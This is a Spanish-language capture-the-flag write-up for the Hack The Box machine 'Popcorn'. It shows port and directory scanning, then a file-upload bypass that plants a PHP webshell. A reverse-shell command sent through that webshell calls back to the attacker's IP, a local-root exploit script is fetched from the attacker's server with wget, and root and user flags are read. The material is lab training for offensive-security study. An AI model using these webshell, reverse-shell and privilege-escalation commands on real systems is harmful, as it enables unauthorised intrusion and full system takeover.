Popcorn

#medium #linux #bypassFileUpload

https://app.hackthebox.com/machines/Popcorn

Enumeración de puertos y servicios

sudo nmap -sS -p- --open --min-rate 5000 -Pn -n -vv 10.129.65.202 -oA openPorts

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

echo -n "$(cat openPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" | xclip -sel clip// Some code

nmap -p 22,80 -sCV -Pn -n -vv 10.129.65.202 -oA openPortsServicesVersion

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAIAn8zzHM1eVS/OaLgV6dgOKaT+kyvjU0pMUqZJ3AgvyOrxHa2m+ydNk8cixF9lP3Z8gLwquTxJDuNJ05xnz9/DzZClqfNfiqrZRACYXsquSAab512kkl+X6CexJYcDVK4qyuXRSEgp4OFY956Aa3CCL7TfZxn+N57WrsBoTEb9PAAAAFQDMosEYukWOzwL00PlxxLC+lBadWQAAAIAhp9/JSROW1jeMX4hCS6Q/M8D1UJYyat9aXoHKg8612mSo/OH8Ht9ULA2vrt06lxoC3O8/1pVD8oztKdJgfQlWW5fLujQajJ+nGVrwGvCRkNjcI0Sfu5zKow+mOG4irtAmAXwPoO5IQJmP0WOgkr+3x8nWazHymoQlCUPBMlDPvgAAAIBmZAfIvcEQmRo8Ef1RaM8vW6FHXFtKFKFWkSJ42XTl3opaSsLaJrgvpimA+wc4bZbrFc4YGsPc+kZbvXN3iPUvQqEldak3yUZRRL3hkF3g3iWjmkpMG/fxNgyJhyDy5tkNRthJWWZoSzxS7sJyPCn6HzYvZ+lKxPNODL+TROLkmQ==
|   2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyBXr3xI9cjrxMH2+DB7lZ6ctfgrek3xenkLLv2vJhQQpQ2ZfBrvkXLsSjQHHwgEbNyNUL+M1OmPFaUPTKiPVP9co0DEzq0RAC+/T4shxnYmxtACC0hqRVQ1HpE4AVjSagfFAmqUvyvSdbGvOeX7WC00SZWPgavL6pVq0qdRm3H22zIVw/Ty9SKxXGmN0qOBq6Lqs2FG8A14fJS9F8GcN9Q7CVGuSIO+UUH53KDOI+vzZqrFbvfz5dwClD19ybduWo95sdUUq/ECtoZ3zuFb6ROI5JJGNWFb6NqfTxAM43+ffZfY28AjB1QntYkezb1Bs04k8FYxb5H7JwhWewoe8xQ==
80/tcp open  http    syn-ack Apache httpd 2.2.12
|_http-title: Did not follow redirect to http://popcorn.htb/
|_http-server-header: Apache/2.2.12 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel

echo '10.129.65.202 popcorn.htb' | sudo tee -a /etc/hosts

ffuf -u http://popcorn.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -c -ic -t 80

index                   [Status: 200, Size: 177, Words: 22, Lines: 5, Duration: 234ms]
test                    [Status: 200, Size: 47420, Words: 2478, Lines: 655, Duration: 272ms]
torrent                 [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 229ms]
rename                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 226ms]

Registrar un usuario

http://popcorn.htb/torrent/users/index.php?mode=register

Iniciar sesión

Subir un archivo .torrent

http://popcorn.htb/torrent/torrents.php?mode=upload

Editar el torrent subido

Actualizar Screenshot

Crear webshell melvin.png.php

<?php system($_GET['cmd']); ?>

Capturar la request con Burp y modificar el header Content-Type

ffuf -u http://popcorn.htb/torrent/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -c -ic -t 80

index                   [Status: 200, Size: 11406, Words: 1103, Lines: 294, Duration: 249ms]
rss                     [Status: 200, Size: 1751, Words: 93, Lines: 44, Duration: 251ms]
templates               [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 235ms]
users                   [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 231ms]
                        [Status: 200, Size: 11406, Words: 1103, Lines: 294, Duration: 3153ms]
download                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3159ms]
admin                   [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 226ms]
health                  [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 229ms]
browse                  [Status: 200, Size: 9320, Words: 794, Lines: 186, Duration: 239ms]
comment                 [Status: 200, Size: 936, Words: 83, Lines: 17, Duration: 227ms]
upload                  [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 231ms]
login                   [Status: 200, Size: 8416, Words: 769, Lines: 228, Duration: 5177ms]
css                     [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 229ms]
images                  [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 6190ms]
edit                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 237ms]
lib                     [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 229ms]
database                [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 229ms]
secure                  [Status: 200, Size: 4, Words: 1, Lines: 3, Duration: 227ms]
js                      [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 230ms]
logout                  [Status: 200, Size: 183, Words: 11, Lines: 1, Duration: 240ms]
config                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 237ms]
preview                 [Status: 200, Size: 28104, Words: 128, Lines: 138, Duration: 241ms]
readme                  [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 229ms]
thumbnail               [Status: 200, Size: 1789, Words: 21, Lines: 11, Duration: 235ms]
torrents                [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 226ms]
validator               [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 236ms]
hide                    [Status: 200, Size: 3765, Words: 194, Lines: 135, Duration: 230ms]

Al hacer hover sobre la imagen se ve el enlace. Botón derecho sobre "Image File Not Found!" y copiamos el enlace.

Ponerse en escucha en la máquina atacante

nc -lvnp 1111

http://popcorn.htb/torrent/upload/c7c8c87bc60987e2308118c1cfe1e388c340ca89.php?cmd=bash+-c+%22bash+-i+%3E%26+/dev/tcp/10.10.14.139/1111+0%3E%261%22

nc -lvnp 1111
Connection from 10.129.65.202:39449
bash: no job control in this shell
www-data@popcorn:/var/www/torrent/upload$

Shell interactiva estable

www-data@popcorn:/var/www/torrent/upload$ cd /home
www-data@popcorn:/home$ ls
george
www-data@popcorn:/home$ cd george/
www-data@popcorn:/home/george$ ls -la
total 860
drwxr-xr-x 3 george george   4096 Oct 26  2023 .
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
lrwxrwxrwx 1 george george      9 Oct 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Oct 12 21:06 user.txt
www-data@popcorn:/home/george$ cat user.txt

User flag

37e8************************1bc5

Privilege Escalation

www-data@popcorn:/home/george$ cd .cache
www-data@popcorn:/home/george/.cache$ ls
motd.legal-displayed

Buscar: motd.legal-displayed

https://www.exploit-db.com/exploits/14339

Compartir el archivo

python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Descargarlo en la máquina víctima

www-data@popcorn:/home/george$ cd /tmp/
www-data@popcorn:/tmp$ wget 10.10.14.139:8000/14339.sh

www-data@popcorn:/tmp$ bash 14339.sh

[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password: 
root@popcorn:/tmp# cd /root
root@popcorn:~# ls
root.txt
root@popcorn:~# cat root.txt

Root flag

6239************************8032

PreviousPerfection NextPrevise

Last updated 3 months ago

hashtagEnumeración de puertos y servicios

hashtagUser flag

hashtagPrivilege Escalation

hashtagRoot flag

Enumeración de puertos y servicios

User flag

Privilege Escalation

Root flag